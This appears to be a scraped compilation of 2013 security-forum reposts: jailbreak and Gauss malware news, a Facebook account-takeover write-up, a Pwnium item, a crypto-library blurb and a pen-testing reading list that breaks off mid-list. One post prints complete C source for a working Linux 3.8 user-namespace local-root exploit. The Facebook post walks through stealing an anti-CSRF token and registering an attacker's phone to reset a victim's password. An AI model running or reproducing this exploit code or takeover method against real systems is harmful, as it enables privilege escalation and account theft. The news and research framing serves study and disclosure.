Nytro

Hash Generator [TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD=align: justify]Hash Generator is the FREE universal hash generator tool which automates the generation of 14 different type of hashes or checksums. It support most of the popular hashes including MD5 family, SHA family, BASE64, LM, NTLM, CRC32, ROT13, RIPEMD, ALDER32, HAVAL, WHIRLPOOL etc. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 100%] [TR] [TD=align: justify] It can even generate hash for the file as well as text input also. User can directly enter or paste any text from clipboard and generate hash. It also supports 'Drag & Drop interface' which allows you to quickly drag files onto the tool for hash generation. Hashes or checksums are mainly used for file integrity verification. Often files downloaded from Internet are checked with MD5/SHA256 hash to make sure file is not tempered. Hashes are also used in encryption and storage of password as well as other sensitive data to protect it from the spying eyes. HashGenerator helps in quickly computing or verifying the hash for any such file or password text. It works on wide range of platforms starting from Windows XP to latest operating system Windows 8. [/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] http://www.youtube.com/watch?v=ImBdB0aPjMs&feature=player_embedded Download: http://securityxploded.com/download.php#hashgenerator Sursa: Hash Generator : All-in-one Tool to Generate Hash MD5/SHA1/SHA256/SHA512/BASE64/LM/NTLM/CRC32 | www.SecurityXploded.com

[h=1]Apple's New iOS Update Blocks Evasi0n Jailbreak--After It's Been Used About 18 Million Times[/h]After 43 days of jailbreaking frenzy, Apple has closed the cell doors again. The latest 6.1.3 update to iOS released Tuesday includes a patch that prevents the use of the hacking tool evasi0n, which since early February has become the most popular program ever for “jailbreaking” phones and tablets to remove their software restrictions. David Wang, one of the four hackers who created evasi0n, confirms that the new update includes a patch for a bug in iOS’s time zone settings, one of a series of vulnerabilities that allowed users to dismantle the iPhone’s and iPads’ considerable security measures. Wang first spotted the bug fix in the beta version of the update released to developers last month. Update: In fact, Apple writes in notes accompanying the update that it has fixed six bugs in total, and graciously credits the hackers behind evasi0n with making the company aware of four of them. In the six weeks since evasi0n was released, however, close to 18 million devices have already been jailbroken, according to data from Jay Freeman, the administrator of the Cydia app store for jailbroken devices. He says he’s counted 18.2 million unique devices running iOS 6 visiting Cydia, including 13.8 million iPhones, 3.4 million iPads, and 1.1 million iPod Touches. Those numbers vastly exceed previous jailbreaks such as Jailbreakme 3, a popular hacking tool for iOS released in the summer of 2011 that was used on around 2 million devices, according to a count at the time by creator Nicholas Allegra. Aside from blocking evasi0n, the update also fixes a bug in iOS that let anyone to bypass an iPhone’s lockscreen using its emergency call function, allowing partial access to the phone’s private data and even to make calls. Compared to some previous jailbreaks, Apple took its time in patching evasi0n. By contrast, the company took only nine days to fix the bugs exploited by Jailbreakme 3. But that tool allowed anyone to jailbreak his or her phone or tablet simply by visiting a website, creating the risk that it would be repurposed by malicious hackers to perform “drive-by downloads” of malware onto Apple devices that visited an infected website. Evasi0n, on the other hand, requires a USB connection between the device being jailbroken and a PC, vastly reducing the risk that it could be used for malicious purposes. “If there’s no injection vector they know about that lets you activate the attack through drive-by, [Apple doesn't] seem to put much priority on it,” says Wang. Wang says that at least one of the bugs used in evasi0n remains in Apple’s mobile operating system. And he’s told me previously that the hacker team who cooperated on evasi0n, known as the evad3rs, has a backup supply of secret bugs in iOS that they’re saving for future jailbreak tools. It’s unclear how many of those bugs might be patched in iOS 6.1.3. But for now, anyway, they don’t plan to waste them on creating a new tool. “We’ll probably wait until the next major release,” says Wang. That means any user who updates to iOS 6.1.3 will lose the ability to jailbreak his or her phone for months or possibly years to come. But Wang says there’s still no fix available to jailbreakers for the lockscreen vulnerability that’s also patched in this update. So any jailbreak fan who foregoes Apple’s latest update should also take extra care not to let their phone out of their sight. Sursa: Apple's New iOS Update Blocks Evasi0n Jailbreak--After It's Been Used About 18 Million Times - Forbes

Puzzle box: The quest to crack the world’s most mysterious malware warhead State-sponsored Gauss contains secret warhead eluding global cracking experts. by Dan Goodin - Mar 14 2013 It was straight out of your favorite spy novel. The US and Israel felt threatened by Iran's totalitarian-esque government and its budding nuclear program. If this initiative wasn't stopped, there was no telling how far the growing conflict could escalate. So militaries from the two countries reportedly turned to one of the most novel weapons of the 21st century: malware. The result was Stuxnet, a powerful computer worm designed to sabotage uranium enrichment operations. When Stuxnet was found infecting hundreds of thousands of computers worldwide, it was only a matter of time until researchers unraveled its complex code to determine its true intent. Today, analysts are up against a similar challenge. But they're finding considerably less success taking apart the Stuxnet cousin known as Gauss. A novel scheme encrypting one of its main engines has so far defied attempts to crack it, generating intrigue and raising speculation that it may deliver a warhead that's more destructive than anything the world has seen before. Gauss generated headlines almost immediately after its discovery was documented last year by researchers from Russia-based antivirus provider Kaspersky Lab. State-of-the-art coding techniques that surreptitiously extracted sensitive data from thousands of Middle Eastern computers were worthy of a James Bond or Mission Impossible movie. Adding to the intrigue, code signatures showed Gauss was spawned from the same developers responsible for Stuxnet, the powerful computer worm reportedly unleashed by the US and Israeli governments to disrupt Iran's nuclear program. Gauss also had links to the highly advanced Flame and Duqu espionage trojans. Gauss contains module names paying homage to the German mathematicians and scientists Johann Carl Friedrich Gauss, Kurt Friedrich Gödel, and Joseph-Louis Lagrange. Its noteworthy features only start there. Gauss has the ability to steal funds and monitor data from clients of several Lebanese banks, making it the first publicly known nation-state sponsored banking trojan. It's also programmed to collect a dizzying array of information about the computers it infects—including its network connections, processes and folders, BIOS, CMOS, RAM, and both local and removable drives. But the most intriguing characteristic of Gauss is an encrypted payload that has so far remained undeciphered, despite the best efforts of cryptographers who have already tried millions of possible keys. Tucked deep inside the Gödel module, the secret warhead is loaded onto USB sticks and removable drives when they're connected to Gauss-infected machines. When the drives are plugged into an uninfected computer later, the mysterious code is executed—but only if it encounters the specific machine or machines targeted by the Gauss developers. On every other computer, the module remains cloaked in an impenetrable envelope that prevents researchers and would-be copycats from reverse engineering the code. The extreme stealth has stoked speculation that the payload may contain a potent exploit that could rival the Stuxnet attack that was bent on destroying uranium centrifuges inside Iran's high-security Natanz enrichment facility. Certainly not your everyday malware. "Considering the link with Flame and Stuxnet, the payload of Gauss must be of similar magnitude," Costin Raiu, director of Kaspersky Lab's global research and analysis team, told Ars. "Given how careful the attackers were to make sure the Gauss payload doesn't fall into the 'wrong' hands, we can assume it is very special." Enlarge / The Gauss architecture. Kaspersky Lab Built to last Gauss is by no means the first malware with a payload that was programmed to remain dormant unless it was installed on computers meeting a narrow set of criteria. Stuxnet also contained code instructing it to destroy uranium-enrichment centrifuges only when they were physically located at Natanz. Researchers have theorized that the trigger was implemented to reduce the chances of collateral damage that might result if Stuxnet took hold in other facilities. (The precaution proved wise, since Stuxnet infected more than 100,000 computers scattered all over the globe.) But as cryptographer Nate Lawson observed more than two years ago, the mechanism Stuxnet used to protect unintended targets from destruction was surprisingly crude for an otherwise advanced cyberweapon developed by countries with almost unlimited budgets. The coding techniques were largely limited to conditional "if/then" range checks that identified computers running German conglomerate Siemens's Simatic Step7 software inside Natanz. If an infected computer met the criteria, the sabotage payload was activated. If not, the exploit sat dormant. Noticeably absent from Stuxnet was any kind of mechanism preventing researchers, enemies, or potential copycat programmers from peering inside the malware to see what the highly selective payload did. That's precisely what security experts such as Ralph Langner did following the Stuxnet discovery. Within a few weeks, the world had its answer: Stuxnet was a powerful cyberweapon unleashed by a well-resourced government bent on sabotaging Iran's nuclear program. While the developers may have taken care to prevent the worm from attacking other countries, they did little to conceal the true aim and methods of their malware, which attacked programmable logic controllers at the heart of the enrichment process. "Encrypting your payload so that only the intended target can decrypt it hides both the identity of the victim and the worm's purpose," Lawson recently told Ars. "If Gauss came after Stuxnet, it's clear the authors disliked the publicity its PLC [programmable logic controller] payload received and made an effort to hide it properly the second time." The notion of software containing a "secure trigger" isn't new either. Scientists such as Fritz Hohl theorized about it as early as 1998 in a paper titled "Time Limited Blackbox Security: Protecting Mobile Agents From Malicious Hosts." Researchers from security firm Core Security expanded on the idea eight years later in a paper titled "Foundations and applications for secure triggers." The idea was to use strong cryptography to ensure a piece of code or content remained secret until a particular event occurred. Once the preselected condition was met—and only if it was met—the concealed payload was automatically disclosed or executed. Otherwise it remained locked inside an impenetrable vault. Gauss developers implemented this advanced concept using a surprisingly unsophisticated set of tools. That set includes the relatively archaic RC4 cipher to encrypt three sections of the Gödel module and the cryptographically weak MD5 algorithm to generate the key. Gauss developers likely chose the outdated design because it worked reliably across a broad range of Windows computers thanks to the Microsoft CryptoAPI. Keys unlocking the Gödel payload are generated dynamically based on the settings of one or more computers that were specifically targeted by the attackers. Only the machine or machines containing a specific set of programs and directories will generate the key. To confound people trying to crack the code—and to considerably slow the speed at which they work—Gauss MD5 hashes the configuration data 10,000 times and uses the final output as the key that unlocks the encrypted code. Gödel's mysterious encrypted data is stored in three sections. Kaspersky Lab Specifically, Gauss enumerates the first entry of an infected computer's path environment, which specifies the Windows directories where executable files can be called without specifying their precise location. Gauss then combines that PATH location with the name of the first directory found in the infected computer's Windows Program Files folder. It takes this string and appends a 16-byte hard-coded cryptographic salt value to it and then hashes the new string 10,000 times. It compares the final hash against a hard-coded verification block. If the hash doesn't pass the verification check, Gauss starts the process all over again, this time appending the second entry of the path to the first Program Files folder. The process is repeated until each entry in the path has been appended to each entry in the Program Files. If a hash value passes the verification check, Gauss has located the mysterious PATH and program file that the Gödel module was programmed to find. It then takes that string, appends a new salt value to it, and hashes it 10,000 times. The resulting hash is the RC4 key used to decrypt one of the three encrypted Gödel sections. If the decrypted block passes an additional verification check, Gauss takes the same path and program files string, then appends a different hard-coded salt to decrypt sections two and three. Enlarge / A simplified flow-chart showing Gödel's decryption routine. Eric Bangeman Example of the string pair, second string starting from “~dir” and first salt. Kaspersky Lab Researchers believe the routine was put in place to attack a computer or computers with a specific program installed. One of the checks Gauss performs ensures that the first letter or symbol of the targeted Program Files directory is a special character such as a tilde (~), bracket ({), or comes from Arabic, Hebrew, or another language with an extended character set. Given the detailed logic built into Gödel, it's fair to assume the attackers had cased their intended target for months or years, using another module in Gauss or other espionage trojans altogether. Literally take forever The use of real Windows configuration variables poses some unusual challenges for cryptographers trying to crack the payload. While the number of possible inputs, for instance, could theoretically be 21000 or higher, the actual number is almost certainly far lower since real-world path strings are almost always in human-readable form. (While a password may randomly be generated, path strings typically follow conventions such as "C:\Program Files\Common Files\Microsoft Shared\Windows Live.") Then again, the strings still have the ability to incorporate unique names or even randomly generated values few eyes have ever seen before. The likelihood that the sought-after Program Files folder contains characters from a different language could pose its own obstacles and benefits. While it narrows the possible choices, it may also require crackers to incorporate alphabets bigger than those that include standard English characters. "Password cracking becomes more difficult as the input space grows," Karsten Nohl, a cryptographer with Security Research Labs, told Ars. "The input space for the Gauss unlock password is all names of Windows programs in certain languages, which should be a relatively small space compared to the billions of combinations a password cracker typically tries. However, nobody has a complete list of Windows programs." He continued: "To find the Gauss unlock password, good heuristics are needed that guess Windows program names. Simply brute-forcing the space from '???...' to '???...' is not an option as it would literally take forever." So far, Kaspersky researchers have tried millions of combinations to no avail. In December, they redoubled their efforts by recruiting the creator of the Hashcat password recovery program. That resulted in ocl-GaussCrack, an open-source application that streamlines the cracking of the Gödel module and harnesses the speed of graphics cards to accelerate the process. Typically, GPU crackers can try billions of guesses per second against MD5-derived hashes, but thanks to the design of the encryption routine, GaussCrack can achieve just 489,000 candidate passcodes each second. Posing yet another burden on crackers, the Gauss architects were able to hinder crackers by iterating the hash 10,000 times, a technique often referred to as key stretching. Just as the amassing of hundreds of millions of real-world passwords has fueled recent advances in password cracking, a comprehensive corpus of likely Windows configurations targeted by Gauss is the most likely way to solve the Gödel mystery. Jens Steube, the Hashcat and GaussCrack developer better known as Atom, said he still hasn't settled on the best method for compiling the data. One possibility is to tap into databases already assembled by antivirus companies or other vendors of software that collect the names of programs installed on hundreds of millions of computers. Another possibility, Kaspersky's Raiu said, is to seek help from the National Institute of Standards and Technology or a similar organization. The encrypted payload in the Gödel module is by no means the only mystery surrounding Gauss. Researchers still don't know how the malware takes hold of target computers in the first place or how it spreads from one machine to another. They're also at a loss to explain why Gauss installs a custom font known as "Palida Narrow" and corresponding registry values on infected machines. Analysts have speculated that the font may be used to steganographically fingerprint the author of certain printed materials. Under alternate theories, Palida Narrow, which appears to contain valid Western, Baltic, and Turkish symbols, may provide a simple means for websites to identify infected machines, or even open a font-based vulnerability to exploit. Enlarge Kaspersky Lab Also unexplained is the Round Robin DNS load balancing technique deployed by control servers used to ferry traffic to and from Gauss-infected machines. The setup suggests that the command servers handled massive amounts of traffic, and yet so far, Kaspersky researchers have been able to find just 2,500 computers infected by the malware. The effort Gauss architects expended setting up the load-balancing system indicates that the true number of affected machines could be in the tens of thousands. Still, the biggest mystery connected to Gauss undoubtedly remains the encrypted payload tucked inside its Gödel module. Given the destruction malware creators brought about with Stuxnet, it wouldn't be a stretch if Gauss targeted additional enemy-operated PLCs or an entirely unseen class of equipment in the fledgling annuls of computer warfare. The choice that Gödel be transmitted using USB drives suggests it was targeting "air-gapped" systems so sensitive they weren't connected to the Internet. "It's one of the biggest mysteries of our times and this is a very cool challenge for any security researcher out there who cares about security," Raiu told Ars. "What could we find inside the Gauss payload? PLC code? Zero-days? Code to target unknown systems? Nobody knows for sure and it is probably the incertitude which makes it the most captivating mystery." Thanks to Jeremy Gosney of Stricture Consulting Group, Hashcat developer Jens Steube, and Johns Hopkins University professor Matt Green for their assistance in reporting this story. Story updated to add "reportedly" in first paragraph. Sursa: Puzzle box: The quest to crack the world’s most mysterious malware warhead | Ars Technica

[h=3]UI Redressing against Facebook[/h] In this post, I'm going to discuss a possible attack scenario, targeting the Facebook web application, that could lead to the reset of account passwords in an automated fashion exploiting a UI Redressing issue with the use of a cross-domain extraction technique. [h=3]UI Redressing bug, again[/h] [h=3][/h] During my research, I discovered a Facebook's web resource that is not protected by the X-Frame-Options and that includes the fb_dtsg token, which is adopted as an anti-CSRF token (Figure 1). The following is the affected URL: Selecteaz? limba | Facebook [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 1 - Facebook's web resource vulnerable to UI Redressing attacks.[/TD] [/TR] [/TABLE] The iframe-to-iframe extraction method can be applied here to extract fb_dtsg's value and, consequently, perform a series of Cross-Site Request Forgery attacks against the integrity of the victim's profile data. [h=3][/h] [h=3]The theory behind the Facebook profiles takeover[/h] [h=3][/h] [h=3][/h] Facebook allows users to add a mobile number that, once certified, can be adopted as username in order to login or reset the account's password. Users can insert their mobile numbers via the Account Settings ? Mobile ? Add a phone ? add your phone number options (Figure 2 and Figure 3): a confirmation code is therefore sent by Facebook's system to the user's mobile phone and it must be inserted (Figure 4) to complete the activation process. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 2 - Users can add their mobile number via the "add your phone number here" link.[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 3 - Facebook's form used to add a mobile number.[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 4 - A confirmation code is sent to the user's mobile and must be entered to complete the process.[/TD] [/TR] [/TABLE] The main issue here is that no password is required to associate the mobile number to the user's profile. Because of this, an attacker may abuse the described UI Redressing vulnerability to steal the fb_dtsg token and register an arbitrary phone number. Despite this, the attacker still needs to insert the confirmation code in order to associate his mobile number. A bit of black magic helps here: the attacker can abuse an SMS to mail mobile application to automatically forward the Facebook text-message (SMS) to an attacker-controlled mail box, thus allowing an hypothetical exploit to fetch the code and complete the insertion process. [h=3]The exploit[/h] [h=3][/h] A working Proof of Concept exploit has been developed in order to demonstrate the described attack. We have also shared the code with the Facebook security team. During my experiments, the Android application SMS2Mail has been adopted to forward the Facebook SMS (Figure 5) to the mail box (Figure 6). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 5 - SMS with the Facebook's confirmation code that has been forwarded to the attacker's mail box.[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 6 - Facebook confirmation code forwarded to the attacker's mailbox.[/TD] [/TR] [/TABLE] The following steps summarize the exploitation phases: The exploit frames the vulnerable resource and allows the victim to play a fake game while performing the cross-domain content extraction; The fb_dtsg anti-CSRF token and the victim's user id are extracted. An HTTP request is forwarded to the Facebook application in order to emulate the attacker-controlled mobile number registration; An text-message (SMS), containing the confirmation code, is sent to the attacker mobile device. An SMS2Mail mobile application is installed on attacker's device and automatically forwards the SMS to an attacker-controlled mail box; The exploit waits for the SMS to be forwarded to the mail box, then extracts the confirmation code and performs a second CSRF attack in order to submit the code itself and complete the mobile number registration. The attacker's mobile number is now associated with the victim's profile and can be used to reset the account's password. As a matter of fact, Facebook allows users to enter a previously associated mobile number (Figure 7) which is then used to send a reset code (Figure 8). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 7 - Reset password mechanism involving the user's mobile number .[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 8 - Facebook's form used to insert the resetting code.[/TD] [/TR] [/TABLE] A fully automated Proof of Concept exploit can be downloaded here, while the following video illustrates the described attack: Posted by Luca De Fulgentis Tuesday, March 19, 2013 Sursa: Nibble Security: UI Redressing against Facebook

[h=2]GNU/Linux kernel(3.8+)Privilege Escalation Vulnerability[/h] #define _GNU_SOURCE #include <sched.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <errno.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/wait.h> int go[2]; char child_stack[1<<20]; extern char **environ; void die(const char *msg) { perror(msg); exit(errno); } int child(void *arg) { char c; close(go[1]); read(go[0], &c, 1); setuid(0); if (chdir("chroot") < 0) die("[-] chdir"); if (chroot(".") < 0) die("[-] chroot"); return 0; } int setup_chroot(const char *me) { mkdir("chroot", 0755); mkdir("chroot/lib64", 0755); mkdir("chroot/bin", 0755); if (link(me, "chroot/lib64/ld-linux-x86-64.so.2") < 0) die("[-] link"); if (link("/bin/su", "chroot/bin/su") < 0) die("[-] link"); return 0; } int main(int argc, char *argv[]) { char *su[] = {"/bin/su", NULL}; char *sh[] = {"/bin/bash", NULL}; char me[256], *mee[] = {me, "1", NULL}; char uidmap[128], map_file[128]; pid_t pid; struct stat st; int fd; if (geteuid() == 0 && argc == 1) { printf("[+] Yay! euid=%d uid=%d\n", geteuid(), getuid()); chown("lib64/ld-linux-x86-64.so.2", 0, 0); chmod("lib64/ld-linux-x86-64.so.2", 04755); exit(0); } else if (geteuid() == 0) { /* this will run outside */ setuid(0); execve(*sh, sh, environ); die("[-] execve"); } printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer\n\n"); memset(me, 0, sizeof(me)); readlink("/proc/self/exe", me, sizeof(me) - 1); printf("[+] Found myself: '%s'\n", me); if (fork() > 0) { printf(" [*] Parent waiting for boomsh to appear ...\n"); for ( { stat(me, &st); if (st.st_uid == 0) break; usleep(1000); } execve(me, mee, environ); die("[-] execve"); } printf(" [*] Setting up chroot ...\n"); setup_chroot(me); printf("[+] Done.\n [*] Cloning evil child ...\n"); if (pipe(go) < 0) die("[-] pipe"); pid = clone(child, child_stack + sizeof(child_stack), CLONE_NEWUSER|CLONE_FS|SIGCHLD, NULL); if (pid == -1) die("[-] clone"); printf("[+] Done.\n [*] Creating UID mapping ...\n"); snprintf(map_file, sizeof(map_file), "/proc/%d/uid_map", pid); if ((fd = open(map_file, O_RDWR)) < 0) die("[-] open"); snprintf(uidmap, sizeof(uidmap), "0 %d 1\n", getuid()); if (write(fd, uidmap, strlen(uidmap)) < 0) die("[-] write"); close(fd); printf("[+] Done.\n"); close(go[0]); write(go[1], "X", 1); waitpid(pid, NULL, 0); execve(*su, su, NULL); die("[-] execve"); return -1; } Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Am redeschis topicul deoarece, desi se abereaza mult, e un subiect important: cum vedem noi hackerii, cine sunt si ce fac ei. In plus, subiectul principal, acest documentar, face o oarecare lumina in unele situatii, chiar daca pe alocuri abereaza. E o tara libera si fiecare are dreptul sa isi exprime opinia si sa ii respecte sau nu pe cei care dau interviuri.

Da, nici de pe nist.gov nu merg, sunt aceleasi, probabil sterse de Google. E interesanta asta: National Vulnerability Database (NVD) National Vulnerability Database (CVE-2013-0913) , kernel 3.8. Iar cealalta, ceva mai multe detalii: http://www.scip.ch/en/?vuldb.8021

[h=1]Google Chrome OS Linux WAS Exploited at Pwnium 2013 for $40,000[/h]By Sean Michael Kerner | March 18, 2013 From the 'Linux Kernel Exploit' files: Earlier this month, Google Chrome running Chrome OS (Linux!) was hailed as being a survivor in the Pwnium/Pwn2own event that hacked IE, Firefox and Chrome browsers on Windows. Apple's Safari running on Mac OS X was not hacked and neither (apparently) was Chrome on Chrome OS. Google disclosed this morning that Chrome on Chrome OS had in fact been exploited - albeit, unreliably. The same researcher that took Google's money last year for exploiting Chrome, known publicly only as 'PinkiePie' was awarded $40,000 for exploiting Chrome/Chrome OS via a Linux kernel bug, config file error and a video parsing flaw. Google has already fixed the flaws in ChromeOS 25.0.1364.173, BUT seeing as this is a Linux kernel flaw, i'm very curious if this affect any/all other Linux distros. As is typical for Google, they offer very little in the way of full-disclosure or detail on the flaw fixed. All that Google publicly has posted now is: [181083] High CVE-2013-0915: Overflow in the GPU process. Credit to Pinkie Pie. [chromium-os:39733] High CVE-2013-0913: Time-of-Check/Time-of-Use and counting overflows in i915 driver. Credit to Pinkie Pie. Neither of those issues is specifically identified as a 'Linux kernel' issue. Google has also not publicly opened up those CVE's so it's not possible to see the exact bug (which possibly could be with the kernel). As Google is a responsible firm, I'd suspect/hope that the bug has been submitted upstream, though right now it's not superclear to me where that is.. In any event, it's a chained bug and not something that was a reliable exploit, but still...would/will be good to see it eliminated from the mainline Linux kernel sooner rather than later. Sursa: Google Chrome OS Linux WAS Exploited at Pwnium 2013 for $40,000 - InternetNews.

[h=1]Stanford Javascript Crypto Library[/h] The Stanford Javascript Crypto Library (hosted here on GitHub) is a project by the Stanford Computer Security Lab to build a secure, powerful, fast, small, easy-to-use, cross-browser library for cryptography in Javascript. SJCL is easy to use: simply run sjcl.encrypt("password", "data") to encrypt data, or sjcl.decrypt("password", "encrypted-data") to decrypt it. For users with more complex security requirements, there is a much more powerful API, described in the documentation and illustrated in this demo page. SJCL is small but powerful. The minified version of the library is under 6.4KB compressed, and yet it posts impressive speed results. (TODO: put up a benchmarks page.) SJCL is secure. It uses the industry-standard AES algorithm at 128, 192 or 256 bits; the SHA256 hash function; the HMAC authentication code; the PBKDF2 password strengthener; and the CCM and OCB authenticated-encryption modes. Just as importantly, the default parameters are sensible: SJCL strengthens your passwords by a factor of 1000 and salts them to protect against rainbow tables, and it authenticates every message it sends to prevent it from being modified. We believe that SJCL provides the best security which is practically available in Javascript. (Unforunately, this is not as great as in desktop applications because it is not feasible to completely protect against code injection, malicious servers and side-channel attacks.) SJCL is cross-browser. We hope. We've tested it on all the install browsers on the security lab computers (including various versions of Internet Explorer, Chrome, Firefox, Safari and Opera on Mac, Linux and Windows) and on the rhino engine, but still need to do more comprehensive testing. We have a test page up on this site; if it reports any failures, please report an issue. SJCL is open. You can use, modify and redistribute it under a BSD license or under the GNU GPL, version 2.0 or higher. SJCL supports primarily symmetric-key cryptography, but there's an experimental branch with elliptic curve support (ECDH public key encryption and ECDSA signatures). SJCL was written by Emily Stark, Mike Hamburg and Dan Boneh at Stanford University. Special thanks to Aldo Cortesi and Roy Nicholson for reporting bugs in earlier versions of SJCL. A whitepaper on SJCL (also by Emily Stark, Mike Hamburg and Dan Boneh) was published in the 2009 Annual Computer Security Applications Conference. Sursa: Stanford Javascript Crypto Library

Resources for Aspiring Penetration Testers Scott Sutherland March 11, 2013 At some point, all penetration testers get asked, “Where did you learn all this stuff?” In my experience, the question often comes from clients and students interested in pen testing. Usually, they’re asking because they aren’t sure where to start. There are a number of two- and four-year college programs that can provide a nice structured approach, but generally I think penetration testing is like any other skillset; if you find the right resources, a good direction, and study hard, you’ll acquire the skills you’re looking for. However, I will say that it does help to already have a strong IT background. Regardless of the path taken, it’s nice to have some decent resources along the way. In this blog, I’ve put together a list of books and online training resources that cover topics and skills that I’ve found useful as a penetration tester. Hopefully the list is also useful to those of you interested in getting your feet wet. Have fun and Hack Responsibly! Recommended Books Read, read, and read some more. Recommending that people “Read the F***ing Manual” (RTMF) is just as important today as it was 20 years ago. The list below is really directed at specific tasks that most penetration testers have to perform. I’m aware that there are some obvious gaps in the list, but I haven’t found any books that I really love related to privilege escalation, network attacks, AV evasion, or penetration testing as a profession. Regardless, I hope you enjoy the books as much as I have. Web Application Hacker’s Handbook 2nd Edition Every penetration tester should have a copy of this book. It has good coverage on a lot of web application attack methods with an emphasis on Burp Suite, which a very robust local HTTP proxy. SQL Injection Attack and Defense This book is very complimentary to the Web Application Hacker’s Hand Book. It provides a pretty straightforward approach for identifying and exploiting SQL injection flaws on common database platforms. As a side note, I also recommend playing with Burp Suite and SQLMap while learning how to perform SQL injection attacks. Web Application Obfuscation This book is also complimentary to the Web Application Hacker’s Hand Book and SQL Injection Attack and Defense. It provides a decent overview of techniques that can be used to essentially hide your attacks from web application firewalls, intrusion prevention systems, and web application input filters. Database Hacker’s Handbook This is an oldie but a goody. It provides some great coverage on how to attack the common database platforms. This can come in handy if you’re hoping to escalate your privileges on the database level after finding an SQL injection issue. Managed Code Rootkits This book provides manual and automated methods for reverse engineering managed code applications and frameworks. It covers the .NET framework, Java RTE., and Dalvik applications. I thought it was interesting because it has a large focus on actually poisoning the frameworks instead of the application directly. However, it should be noted that this book does not focus on advanced debugging techniques like most reversing books. A Guide to Kernel Exploitation: Attacking the Core Not all penetration testers spend their days developing kernel exploits, but it’s still good to know the basics. This book has a focus on understanding kernel exploits and how they actually expose operating system vulnerabilities. So far, it’s been a good read, but I haven’t finished it yet. Someone also recently recommended The Shellcoder’s Handbook to me. So consider that as well. Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software I liked this one a lot. It provides a good assembly primer which can come in handy in a lot of ways during a penetration test. It also provides decent coverage in areas that you would expect like static and dynamic malware analysis, file structures, test handlers, packers, and debugging. I’ve also heard that the IDA PRO Book is great if you want to become the reversing master of the universe. However, I don’t actually own it at the moment. Gray Hat Python I really like this book as well. It’s a quick read and it does a good job of describing different debugging, injection, and fuzzing techniques. It also provides a lot of sample code that can be used to perform tasks like hooking and DLL/code injection. I’ve found both techniques to be quite handy for avoiding anti-virus solutions and stealing data protected with encryption. Windows® Internals, Part 1 / Part 2: Covering Windows Server® 2008 R2 and Windows 7 I will most likely never finish either of these books in their entirety. However, they do make great references. If you ever need to know anything about how any part of Windows works, these are the go-to books. Network exploration and security auditing cookbook Nmap has become one of the fundamental “tools of the trade” over the past decade or so. In my opinion, it’s as valuable to administrators as it is to attackers. I think that every IT professional should know what Nmap is and how to use it. This book is a great start for someone who has not been exposed to it in the past. It covers everything from basic system discovery to writing your own plugins to scan for vulnerabilities. MetaSploit: A Penetration Tester’s Guide MetaSploit has also become one of the fundamental “tools of the trade” in recent years. There is a lot of community involvement and I think this is a good book for beginners who want to learn more about MetaSploit and some practical use cases. Free Online Training and Vulnerable VMs Obviously, there are ton of great blogs, training sites, and vulnerable VMs/application out there. I will not be coving all of them. However, I’ve tried to include online resources that are valuable for beginners and veterans alike. SecurityTube SecurityTube is like YouTube, but the videos are dedicated to teaching penetration test skills. Our intern actually recommended this site to me before I knew what it was. Since that time, I’ve been checking every time I start learning a new topic just to see if they have already covered it. I feel the quality of the tutorials is great and obviously recommend it. Irongeek It’s not a pretty site, but it provides a lot of good content. It is also known for releasing video presentations from security conferences is record time. MetaSploit Unleashed This web site provides a free online course all about MetaSploit. They do ask for donations to fund Hackers for Charity which raises funds for underprivileged children in East Africa. It’s a great site with a great cause – I recommend checking it out. VulnHub Reading only gets you so far. Most people in IT are hands on learners so, in order to get your hands dirty, I recommend checking out VulnHub. This is a relatively new site that supplies virtual machines that are designed to be vulnerable. For those of you looking for a quick way to set up a testing lab at home, this may be the most cost/time affective solution. Bug bounties If you feel you have the skills that can now pay the bills, there are lots of companies willing to pay real money if you find a big issue in their product. Below is a site dedicated to consolidating a list of the companies currently paying “bug bounties”. Good Google Searches As I mentioned earlier, I haven’t been able to find books that cover everything I’d like them to. Where books fail, Google usually succeeds. I suggest using it to find good archived presentations from security conferences such as Defcon, Blackhat, Derby con etc. Below I’ve also provided some topics that you might find interesting. Windows Penetration and Escalation In my experience, 90% of enterprise environments are Windows-based operating systems that centralized access control around Active Directory Services. Therefore, it’s good to have an understanding of the tools and techniques used to escalate privileges in those environments. Unfortunately, I have yet to find a single book that covers well; below are some basic keywords, vulnerability categories, and tools to get you started. Default passwords Clear text passwords Excessive privileges: Users, services, gui, files, registry, memory Insecure local and remote services Insecure schedule tasks Local and remote exploits Password guessing: medusa, hydra, bruter, and MetaSploit Password and hash dumping: Cain, lsa secrets, credential manager, fgdump, mimikatz, MetaSploit post modules Password hash cracking: john the ripper, hashcat, lophtcrack, masking, Cain Impersonating users: incognito, mimikatz, pass the hash, MetaSploit psexec, shared accounts, smbexec Linux Penetration and Escalation Even though Linux and UNIX systems aren’t in the majority on most networks, they still have a role to play and so, naturally, it’s good to understand their soft spots as well. For the most part, Linux has many of the same basic keywords and vulnerability categories as Windows: Default passwords Clear text passwords Excessive privileges: Users, services, gui, files, memory, setuid, 